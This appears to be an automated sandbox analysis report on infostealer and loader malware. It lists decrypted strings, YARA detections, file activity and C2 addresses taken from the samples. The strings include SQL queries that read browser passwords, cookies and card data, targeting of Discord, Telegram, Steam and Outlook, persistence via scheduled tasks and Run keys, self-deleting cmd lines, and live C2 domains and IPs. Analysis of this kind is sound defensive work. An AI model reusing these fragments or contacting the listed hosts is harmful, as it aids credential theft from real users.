Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: PATH
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: C:\ProgramData\nss3.dll
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: NSS_Init
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: NSS_Shutdown
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: PK11_GetInternalKeySlot
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: PK11_FreeSlot
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: PK11_Authenticate
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: PK11SDR_Decrypt
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: C:\ProgramData\
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: SELECT origin_url, username_value, password_value FROM logins
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: browser:
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: profile:
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: url:
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: login:
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: password:
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: Opera
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: OperaGX
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: Network
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: cookies
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: .txt
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: TRUE
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: FALSE
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: autofill
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: SELECT name, value FROM autofill
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: history
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: SELECT url FROM urls LIMIT 1000
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: SELECT name_on_card, expiration_month, expiration_year, card_number_encrypted FROM credit_cards
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: name:
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: month:
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: year:
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: card:
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: Cookies
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: Login Data
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: Web Data
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: History
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: logins.json
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: formSubmitURL
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: usernameField
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: encryptedUsername
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: encryptedPassword
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: guid
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: SELECT host, isHttpOnly, path, isSecure, expiry, name, value FROM moz_cookies
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: SELECT fieldname, value FROM moz_formhistory
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: SELECT url FROM moz_places LIMIT 1000
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: cookies.sqlite
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: formhistory.sqlite
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: places.sqlite
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: plugins
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: Local Extension Settings
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: Sync Extension Settings
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: IndexedDB
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: Opera Stable
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: Opera GX Stable
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: CURRENT
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: chrome-extension_
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: _0.indexeddb.leveldb
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: Local State
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: profiles.ini
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: chrome
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: opera
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: firefox
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: wallets
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: %08lX%04lX%lu
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: ProductName
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: %d/%d/%d %d:%d:%d
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: ProcessorNameString
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: DisplayName
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: DisplayVersion
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: Network Info:
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: - IP: IP?
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: - Country: ISO?
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: System Summary:
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: - HWID:
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: - OS:
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: - Architecture:
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: - UserName:
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: - Computer Name:
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: - Local Time:
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: - UTC:
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: - Language:
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: - Keyboards:
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: - Laptop:
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: - Running Path:
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: - CPU:
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: - Threads:
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: - Cores:
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: - RAM:
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: - Display Resolution:
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: - GPU:
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: User Agents:
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: Installed Apps:
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: All Users:
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: Current User:
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: Process List:
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: system_info.txt
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: freebl3.dll
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: mozglue.dll
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: msvcp140.dll
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: nss3.dll
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: softokn3.dll
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: vcruntime140.dll
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: \Temp\
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: .exe
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: runas
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: open
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: /c start
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: %DESKTOP%
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: %APPDATA%
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: %LOCALAPPDATA%
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: %USERPROFILE%
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: %DOCUMENTS%
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: %PROGRAMFILES%
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: %PROGRAMFILES_86%
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: %RECENT%
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: *.lnk
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: files
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: \discord\
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: \Local Storage\leveldb\CURRENT
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: \Local Storage\leveldb
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: \Telegram Desktop\
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: key_datas
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: D877F783D5D3EF8C*
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: map*
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: A7FDF864FBC10B77*
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: A92DAA6EA6F891F2*
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: F8806DD0C461824F*
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: Telegram
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: *.tox
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: *.ini
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: Password
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: Software\Microsoft\Office\14.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: oftware\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676\
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: 00000001
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: 00000002
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: 00000003
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: 00000004
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: \Outlook\accounts.txt
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: Pidgin
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: \.purple\
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: accounts.xml
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: dQw4w9WgXcQ
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: token:
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: Software\Valve\Steam
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: SteamPath
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: \config\
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: ssfn*
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: config.vdf
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: DialogConfig.vdf
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: DialogConfigOverlay*.vdf
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: libraryfolders.vdf
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: loginusers.vdf
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: \Steam\
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: sqlite3.dll
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: browsers
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: done
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: soft
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: \Discord\tokens.txt
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: /c timeout /t 5 & del /f /q "
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: " & del "C:\ProgramData\*.dll"" & exit
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: C:\Windows\system32\cmd.exe
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: https
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: Content-Type: multipart/form-data; boundary=----
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: POST
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: HTTP/1.1
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: Content-Disposition: form-data; name="
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: hwid
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: build
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: token
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: file_name
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: file
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: message
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890
Source: 47.2.RegAsm.exe.400000.0.unpack String decryptor: screenshot.jpg
Source: 39.2.NewB.exe.e50000.0.unpack String decryptor: 185.172.128.19
Source: 39.2.NewB.exe.e50000.0.unpack String decryptor: /ghsdh39s/index.php
Source: 39.2.NewB.exe.e50000.0.unpack String decryptor: S-%lu-
Source: 39.2.NewB.exe.e50000.0.unpack String decryptor: cd1f156d67
Source: 39.2.NewB.exe.e50000.0.unpack String decryptor: Utsysc.exe
Source: 39.2.NewB.exe.e50000.0.unpack String decryptor: SCHTASKS
Source: 39.2.NewB.exe.e50000.0.unpack String decryptor: /Create /SC MINUTE /MO 1 /TN
Source: 39.2.NewB.exe.e50000.0.unpack String decryptor: /TR "
Source: 39.2.NewB.exe.e50000.0.unpack String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
Source: 39.2.NewB.exe.e50000.0.unpack String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
Source: 39.2.NewB.exe.e50000.0.unpack String decryptor: Startup
Source: 39.2.NewB.exe.e50000.0.unpack String decryptor: cmd /C RMDIR /s/q
Source: 39.2.NewB.exe.e50000.0.unpack String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Source: 39.2.NewB.exe.e50000.0.unpack String decryptor: rundll32
Source: 39.2.NewB.exe.e50000.0.unpack String decryptor: /Delete /TN "
Source: 39.2.NewB.exe.e50000.0.unpack String decryptor: Programs
Source: 39.2.NewB.exe.e50000.0.unpack String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
Source: 39.2.NewB.exe.e50000.0.unpack String decryptor: %USERPROFILE%
Source: 39.2.NewB.exe.e50000.0.unpack String decryptor: cred.dll|clip.dll|
Source: 39.2.NewB.exe.e50000.0.unpack String decryptor: http://
Source: 39.2.NewB.exe.e50000.0.unpack String decryptor: https://
Source: 39.2.NewB.exe.e50000.0.unpack String decryptor: /Plugins/
Source: 39.2.NewB.exe.e50000.0.unpack String decryptor: &unit=
Source: 39.2.NewB.exe.e50000.0.unpack String decryptor: shell32.dll
Source: 39.2.NewB.exe.e50000.0.unpack String decryptor: kernel32.dll
Source: 39.2.NewB.exe.e50000.0.unpack String decryptor: GetNativeSystemInfo
Source: 39.2.NewB.exe.e50000.0.unpack String decryptor: ProgramData\
Source: 39.2.NewB.exe.e50000.0.unpack String decryptor: AVAST Software
Source: 39.2.NewB.exe.e50000.0.unpack String decryptor: Kaspersky Lab
Source: 39.2.NewB.exe.e50000.0.unpack String decryptor: Panda Security
Source: 39.2.NewB.exe.e50000.0.unpack String decryptor: Doctor Web
Source: 39.2.NewB.exe.e50000.0.unpack String decryptor: 360TotalSecurity
Source: 39.2.NewB.exe.e50000.0.unpack String decryptor: Bitdefender
Source: 39.2.NewB.exe.e50000.0.unpack String decryptor: Norton
Source: 39.2.NewB.exe.e50000.0.unpack String decryptor: Sophos
Source: 39.2.NewB.exe.e50000.0.unpack String decryptor: Comodo
Source: 39.2.NewB.exe.e50000.0.unpack String decryptor: WinDefender
Source: 39.2.NewB.exe.e50000.0.unpack String decryptor: 0123456789
Source: 39.2.NewB.exe.e50000.0.unpack String decryptor: Content-Type: multipart/form-data; boundary=----
Source: 39.2.NewB.exe.e50000.0.unpack String decryptor: ------
Source: 39.2.NewB.exe.e50000.0.unpack String decryptor: ?scr=1
Source: 39.2.NewB.exe.e50000.0.unpack String decryptor: Content-Type: application/x-www-form-urlencoded
Source: 39.2.NewB.exe.e50000.0.unpack String decryptor: SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName
Source: 39.2.NewB.exe.e50000.0.unpack String decryptor: ComputerName
Source: 39.2.NewB.exe.e50000.0.unpack String decryptor: abcdefghijklmnopqrstuvwxyz0123456789-_
Source: 39.2.NewB.exe.e50000.0.unpack String decryptor: -unicode-
Source: 39.2.NewB.exe.e50000.0.unpack String decryptor: SYSTEM\CurrentControlSet\Control\UnitedVideo\CONTROL\VIDEO\
Source: 39.2.NewB.exe.e50000.0.unpack String decryptor: SYSTEM\ControlSet001\Services\BasicDisplay\Video
Source: 39.2.NewB.exe.e50000.0.unpack String decryptor: VideoID
Source: 39.2.NewB.exe.e50000.0.unpack String decryptor: DefaultSettings.XResolution
Source: 39.2.NewB.exe.e50000.0.unpack String decryptor: DefaultSettings.YResolution
Source: 39.2.NewB.exe.e50000.0.unpack String decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion
Source: 39.2.NewB.exe.e50000.0.unpack String decryptor: ProductName
Source: 39.2.NewB.exe.e50000.0.unpack String decryptor: CurrentBuild
Source: 39.2.NewB.exe.e50000.0.unpack String decryptor: echo Y|CACLS "
Source: 39.2.NewB.exe.e50000.0.unpack String decryptor: " /P "
Source: 39.2.NewB.exe.e50000.0.unpack String decryptor: CACLS "
Source: 39.2.NewB.exe.e50000.0.unpack String decryptor: :R" /E
Source: 39.2.NewB.exe.e50000.0.unpack String decryptor: :F" /E
Source: 39.2.NewB.exe.e50000.0.unpack String decryptor: &&Exit
Source: 39.2.NewB.exe.e50000.0.unpack String decryptor: rundll32.exe
Source: 39.2.NewB.exe.e50000.0.unpack String decryptor: "taskkill /f /im "
Source: 39.2.NewB.exe.e50000.0.unpack String decryptor: " && timeout 1 && del
Source: 39.2.NewB.exe.e50000.0.unpack String decryptor: && Exit"
Source: 39.2.NewB.exe.e50000.0.unpack String decryptor: " && ren
Source: 39.2.NewB.exe.e50000.0.unpack String decryptor: Powershell.exe
Source: 39.2.NewB.exe.e50000.0.unpack String decryptor: -executionpolicy remotesigned -File "
Source: 39.2.NewB.exe.e50000.0.unpack String decryptor: shutdown -s -t 0
Source: 39.2.NewB.exe.e50000.0.unpack String decryptor: /w']fC
Source: 39.2.NewB.exe.e50000.0.unpack String decryptor: vw(hF=
Source: 29.2.RegAsm.exe.400000.0.unpack String decryptor: pillowbrocccolipe.shop
Source: 29.2.RegAsm.exe.400000.0.unpack String decryptor: communicationgenerwo.shop
Source: 29.2.RegAsm.exe.400000.0.unpack String decryptor: diskretainvigorousiw.shop
Source: 29.2.RegAsm.exe.400000.0.unpack String decryptor: affordcharmcropwo.shop
Source: 29.2.RegAsm.exe.400000.0.unpack String decryptor: dismissalcylinderhostw.shop
Source: 29.2.RegAsm.exe.400000.0.unpack String decryptor: enthusiasimtitleow.shop
Source: 29.2.RegAsm.exe.400000.0.unpack String decryptor: worryfillvolcawoi.shop
Source: 29.2.RegAsm.exe.400000.0.unpack String decryptor: cleartotalfisherwo.shop
Source: 29.2.RegAsm.exe.400000.0.unpack String decryptor: affordcharmcropwo.shop
Source: 29.2.RegAsm.exe.400000.0.unpack String decryptor: lid=%s&j=%s&ver=4.0
Source: 29.2.RegAsm.exe.400000.0.unpack String decryptor: TeslaBrowser/5.5
Source: 29.2.RegAsm.exe.400000.0.unpack String decryptor: - Screen Resoluton:
Source: 29.2.RegAsm.exe.400000.0.unpack String decryptor: - Physical Installed Memory:
Source: 29.2.RegAsm.exe.400000.0.unpack String decryptor: Workgroup: -
Source: 29.2.RegAsm.exe.400000.0.unpack String decryptor: LGNDR1--ketamine
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Code function: 9_2_008A3EB0 CryptUnprotectData,CryptUnprotectData, 9_2_008A3EB0

Exploits
barindex
Yara detected UAC Bypass using CMSTP
Source: Yara match File source: 00000032.00000002.7140120246.000001F380020000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: file300un.exe PID: 7556, type: MEMORYSTR
Uses 32bit PE files
Source: 1CMweaqlKp.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\AppData\Local\Temp\1000234001\ISetup8.exe File opened: C:\Windows\SysWOW64\msvcr100.dll
Source: Binary string: freebl3.pdb source: freebl3[1].dll.51.dr
Source: Binary string: C:\wutimosolix_62\gowaj\tosusinana-la.pdb source: ISetup8.exe, 00000029.00000003.2151074345.0000000003871000.00000004.00000020.00020000.00000000.sdmp, u6po.0.exe, 00000033.00000000.2149099984.0000000000412000.00000002.00000001.01000000.0000001F.sdmp
Source: Binary string: freebl3.pdbp source: freebl3[1].dll.51.dr
Source: Binary string: C:\somilixucasoba_pi.pdb source: ISetup8.exe, 00000029.00000000.2055258369.0000000000412000.00000002.00000001.01000000.00000019.sdmp, rVg8HtIzXa4xhJHL7Pn8A6d2.exe.54.dr
Source: Binary string: file300un.PDBI: source: file300un.exe, 00000032.00000002.7139604951.000000C2DA0F3000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: C:\rute\dazazef.pdb source: toolspub1.exe, 00000031.00000000.2109256617.0000000000412000.00000002.00000001.01000000.0000001D.sdmp, toolspub1.exe, 00000031.00000002.2197395229.0000000000412000.00000002.00000001.01000000.0000001D.sdmp
Source: Binary string: mscorlib.pdb source: WERA6A7.tmp.dmp.34.dr
Source: Binary string: System.ni.pdbRSDS source: WERA6A7.tmp.dmp.34.dr
Source: Binary string: C:\dimohisek.pdb source: ppcQqLgPI8Dyy7YykX33fm5x.exe.54.dr
Source: Binary string: Croco.pdb source: WERA6A7.tmp.dmp.34.dr
Source: Binary string: C:\Users\user\AppData\Local\Temp\1000075001\file300un.PDB source: file300un.exe, 00000032.00000002.7139604951.000000C2DA0F3000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: YC:\rute\dazazef.pdb source: toolspub1.exe, 00000031.00000000.2109256617.0000000000412000.00000002.00000001.01000000.0000001D.sdmp, toolspub1.exe, 00000031.00000002.2197395229.0000000000412000.00000002.00000001.01000000.0000001D.sdmp
Source: Binary string: mscorlib.ni.pdb source: WERA6A7.tmp.dmp.34.dr
Source: Binary string: ,C:\dimohisek.pdb source: ppcQqLgPI8Dyy7YykX33fm5x.exe.54.dr
Source: Binary string: pC:\Users\user\AppData\Local\Temp\1000075001\file300un.PDB source: file300un.exe, 00000032.00000002.7139604951.000000C2DA0F3000.00000004.00000010.00020000.00000000.sdmp
Source: Binary string: System.pdb4 source: WERA6A7.tmp.dmp.34.dr
Source: Binary string: System.Core.pdb source: WERA6A7.tmp.dmp.34.dr
Source: Binary string: mscorlib.ni.pdbRSDS source: WERA6A7.tmp.dmp.34.dr
Source: Binary string: GC:\somilixucasoba_pi.pdb source: ISetup8.exe, 00000029.00000000.2055258369.0000000000412000.00000002.00000001.01000000.00000019.sdmp, rVg8HtIzXa4xhJHL7Pn8A6d2.exe.54.dr
Source: Binary string: System.ni.pdb source: WERA6A7.tmp.dmp.34.dr
Source: Binary string: System.pdb source: WERA6A7.tmp.dmp.34.dr
Source: Binary string: System.Core.ni.pdbRSDS source: WERA6A7.tmp.dmp.34.dr
Source: Binary string: System.Core.ni.pdb source: WERA6A7.tmp.dmp.34.dr
Shows file infection / information gathering behavior (enumerates multiple directory for files)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Directory queried: number of queries: 1081
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Code function: 9_2_008A33B0 FindFirstFileA,FindNextFileA, 9_2_008A33B0
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Code function: 9_2_008C3B20 FindFirstFileA,FindNextFileA,SetFileAttributesA,RemoveDirectoryA,std::_Throw_Cpp_error,std::_Throw_Cpp_error, 9_2_008C3B20
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Code function: 9_2_00811F8C FindFirstFileExW, 9_2_00811F8C
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe File opened: C:\Users\user Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe File opened: C:\Users\user\Documents\desktop.ini Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe File opened: C:\Users\user\AppData Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe File opened: C:\Users\user\AppData\Local\Temp Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe File opened: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000019001\amert.exe File opened: C:\Users\user\AppData\Local Jump to behavior

Networking
barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 193.233.132.56 80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: pillowbrocccolipe.shop
Source: Malware configuration extractor URLs: communicationgenerwo.shop
Source: Malware configuration extractor URLs: diskretainvigorousiw.shop
Source: Malware configuration extractor URLs: affordcharmcropwo.shop
Source: Malware configuration extractor URLs: dismissalcylinderhostw.shop
Source: Malware configuration extractor URLs: enthusiasimtitleow.shop
Source: Malware configuration extractor URLs: worryfillvolcawoi.shop
Source: Malware configuration extractor URLs: cleartotalfisherwo.shop
Source: Malware configuration extractor URLs: affordcharmcropwo.shop
Source: Malware configuration extractor URLs: http://185.172.128.150/c698e1bc8a2f5e6d.php
Source: Malware configuration extractor URLs: http://trad-einmyus.com/index.php
Source: Malware configuration extractor URLs: http://tradein-myus.com/index.php
Source: Malware configuration extractor URLs: http://trade-inmyus.com/index.php
Source: Malware configuration extractor IPs: 185.172.128.19
Source: Malware configuration extractor URLs: 185.215.113.67:26260
Creates HTML files with .exe extension (expired dropper behavior)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: EubzUqqfLmBbNiHWxubQa6s2.exe.54.dr
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: dq1f6mXIBjMzMXMQVeg2fNsL.exe.54.dr
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: MTc4G09Eq4noHZ0G091uBZf1.exe.54.dr
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: 5aIar1h6imWjPJZYPL4QSqoe.exe.54.dr
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: r5kIpAOOvnafOvgnH4OtxIFK.exe.54.dr
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: s0yoB0FX6GRQugk063ujbi4o.exe.54.dr
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: EUl5mGPccm3Ux8yn4fNnNA26.exe.54.dr
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: AN3CiEs9vHs3cPsEPcJxdtOY.exe.54.dr
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: K7e4fpNGO8JkAsFxVXguIAcd.exe.54.dr
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: qhzSo7WKfB79QVVeIp5fAbeL.exe.54.dr
Yara detected Generic Downloader
Source: Yara match File source: 50.2.file300un.exe.1f3800d4830.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 50.2.file300un.exe.1f3800d7298.0.raw.unpack, type: UNPACKEDPE
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 193.233.132.139 193.233.132.139
Source: Joe Sandbox View IP Address: 185.172.128.90 185.172.128.90
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
